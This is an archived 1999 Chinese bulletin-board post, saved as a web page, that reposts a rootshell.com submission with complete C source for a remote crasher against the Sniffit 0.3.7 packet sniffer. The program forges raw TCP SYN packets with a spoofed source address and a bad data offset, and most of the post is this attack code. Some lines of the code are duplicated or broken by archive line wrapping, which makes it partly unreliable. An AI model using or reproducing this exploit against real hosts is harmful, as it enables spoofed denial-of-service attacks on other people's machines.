📄 429.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="317.htm">上一层</a>][<a href="430.htm">下一篇</a>]
<hr><p align="left"><small>发信人: biff (大可), 信区: Security <br>
标 题: crash sniffit <br>
发信站: 武汉白云黄鹤站 (Sun May 16 15:35:41 1999), 站内信件 <br>
sniffit功能很强大,一个局域网的是不是很害怕别人发现你做了什么呢? <br>
好了,现在有办法啦,不过只能针对3.5版本的哦~~ 太可惜了!但是有了这个 <br>
万一有人在偷听,嘿嘿,就有办法啦! <br>
试试吧. <br>
[ http://www.rootshell.com/ ] <br>
From anihilato@famipow.com Wed Feb 17 16:17:12 1999 <br>
Date: Thu, 18 Feb 1999 01:16:31 +0100 <br>
From: "K`\\meleon" <anihilato@famipow.com> <br>
To: submission@rootshell.com <br>
Subject: Sniffit buffer overflow <br>
Hi, <br>
I discovered the last version of sniffit does segfault when receiving a <br>
packet whith a data offset > 5, <br>
which means any sniffit can be crashed remotely. <br>
Exploit code follows. <br>
-- <br>
K `\ m e l e o n <br>
email : anihilato@famipow.com <br>
irc : irc.famipow.com (6667) #europe <br>
[ Part 2: "Attached Text" ] <br>
/* Sniffit 0.3.7 (and below) crasher <br>
* <br>
* There is a buffer overflow condition in sniffit when receiving <br>
* a packet with a data offset > 5, thus allowing remote denial of service. <br>
* <br>
* Code follows. <br>
* To compile, kiddies : cc -o scrash scrash.c <br>
* <br>
* K`\meleon (anihilato@famipow.com or irc.famipow.com #europe) <br>
*/ <br>
#include <stdio.h> <br>
#include <netdb.h> <br>
#include <errno.h> <br>
#include <netinet/in.h> <br>
#include <sys/socket.h> <br>
#include <sys/types.h> <br>
#include <linux/socket.h> <br>
#include <linux/ip.h> <br>
#include <linux/tcp.h> <br>
#define TCPHDR sizeof(struct tcphdr) <br>
#define IPHDR sizeof(struct iphdr) <br>
#define PACKETSIZE TCPHDR + IPHDR <br>
unsigned short in_cksum(unsigned short *ptr,int nbytes){ // this function i <br>
s ri <br>
p'd :) <br>
register long sum; // assumes long == 32 bits <br>
u_short oddbyte; <br>
register u_short answer; // assumes u_short == 16 bits <br>
sum = 0; <br>
while (nbytes > 1) { <br>
sum += *ptr++; <br>
nbytes -= 2; <br>
} <br>
if (nbytes == 1) { <br>
oddbyte = 0; // make sure top ha <br>
lf i <br>
s zero <br>
*((u_char *) &oddbyte) = *(u_char *)ptr; // one byte only <br>
sum += oddbyte; <br>
} <br>
sum = (sum >> 16) + (sum & 0xffff); // add high-16 to low-16 <br>
sum += (sum >> 16); // add carry <br>
answer = ~sum; // ones-complement, then tru <br>
ncat <br>
ncat <br>
e to 16 bits <br>
return(answer); <br>
} <br>
void resolve_address(struct sockaddr * addr, char *hostname, u_short port) <br>
{ <br>
struct sockaddr_in *address; <br>
struct hostent *host; <br>
address = (struct sockaddr_in *)addr; <br>
(void) bzero( (char *)address, sizeof(struct sockaddr_in) ); <br>
address->sin_family = AF_INET; <br>
address->sin_port = htons(port); <br>
address->sin_addr.s_addr = inet_addr(hostname); <br>
if ((int)address->sin_addr.s_addr == -1) { <br>
host = gethostbyname(hostname); <br>
if (host) { <br>
bcopy( host->h_addr, (char *)&address->sin_addr,host <br>
->h_ <br>
length); <br>
} <br>
else { <br>
fprintf(stderr, "Cannot resolve %s, reverting to defaul <br>
t 1. <br>
t 1. <br>
2.3.4\n", hostname); <br>
address->sin_addr.s_addr = inet_addr("1.2.3.4"); <br>
} <br>
} <br>
} <br>
void sendcrash (char *argv[], struct hostent *host) <br>
{ <br>
int sockfd, n; <br>
static struct sockaddr_in local_sin; <br>
static struct sockaddr_in remote_sin; <br>
struct tpack{ <br>
struct iphdr ip; <br>
struct tcphdr tcp; <br>
}tpack; <br>
struct pseudo_header{ <br>
unsigned source_address; <br>
unsigned dest_address; <br>
unsigned char placeholder; <br>
unsigned char protocol; <br>
unsigned short tcp_length; <br>
struct tcphdr tcp; <br>
}pheader; <br>
}pheader; <br>
resolve_address((struct sockaddr *)&local_sin, argv[1], 31337); <br>
resolve_address((struct sockaddr *)&remote_sin, argv[2], 31337); <br>
tpack.tcp.source=htons(31337); <br>
tpack.tcp.dest=htons(31337); <br>
tpack.tcp.seq=ntohl(269167349); <br>
tpack.tcp.doff=6; // This is it <br>
tpack.tcp.res1=0; <br>
tpack.tcp.res2=0; <br>
tpack.tcp.urg=0; <br>
tpack.tcp.ack=0; <br>
tpack.tcp.psh=0; <br>
tpack.tcp.rst=0; <br>
tpack.tcp.syn=1; <br>
tpack.tcp.fin=0; <br>
tpack.tcp.window=0; <br>
tpack.tcp.check=0; <br>
tpack.tcp.urg_ptr=0; <br>
// IP header <br>
tpack.ip.version=4; <br>
tpack.ip.ihl=5; <br>
tpack.ip.tos=0; <br>
tpack.ip.tot_len=htons(IPHDR+TCPHDR); <br>
tpack.ip.id=htons(2); <br>
tpack.ip.frag_off=0; <br>
tpack.ip.ttl=64; <br>
tpack.ip.protocol=IPPROTO_TCP; <br>
tpack.ip.check=0; <br>
tpack.ip.saddr=local_sin.sin_addr.s_addr; <br>
tpack.ip.daddr=remote_sin.sin_addr.s_addr; <br>
// IP header checksum <br>
tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR); <br>
// TCP header checksum <br>
pheader.source_address=(unsigned)tpack.ip.saddr; <br>
pheader.dest_address=(unsigned)tpack.ip.daddr; <br>
pheader.placeholder=0; <br>
pheader.protocol=IPPROTO_TCP; <br>
pheader.tcp_length=htons(TCPHDR); <br>
bcopy((char *)&tpack.tcp,(char *)&pheader.tcp,TCPHDR); <br>
tpack.tcp.check=in_cksum((unsigned short *)&pheader,TCPHDR+12); <br>
if ( (sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) { <br>
perror("socket"); <br>
exit(1); <br>
} <br>
printf("Discovered and coded by K`\\meleon\n"); <br>
printf("Sending crash...\n"); <br>
n = sendto(sockfd, &tpack, PACKETSIZE, 0, (struct sockaddr *)&remote_sin, si <br>
zeof <br>
(remote_sin)); <br>
if (n != PACKETSIZE) { <br>
perror("Damn, crash packet was not sent properly"); <br>
close(sockfd); <br>
exit(1); <br>
} <br>
printf("CraSh SenT #$!\n"); <br>
close(sockfd); <br>
} <br>
main(int argc, char *argv[]) <br>
{ <br>
int i; <br>
struct hostent *host; <br>
if ( (getuid() != 0) && (geteuid() != 0) ) { <br>
printf("Sniffit CraSheR\n"); <br>
printf("Discovered and coded by K`\\meleon\n"); <br>
printf("You need to be r00t to run this prog...\n"); <br>
exit(1); <br>
} <br>
if (argc != 3 ) { <br>
printf("Sniffit CraSheR\n"); <br>
printf("Discovered and coded by K`\\meleon\n"); <br>
printf("Usage : %s <from host> <victim host>\n", argv[0]); <br>
exit(1); <br>
} <br>
if ( (host = gethostbyname(argv[2])) == 0) { <br>
herror("Hostname"); <br>
exit(1); <br>
} <br>
sendcrash(argv, host); <br>
} <br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="317.htm">上一层</a>][<a href="430.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -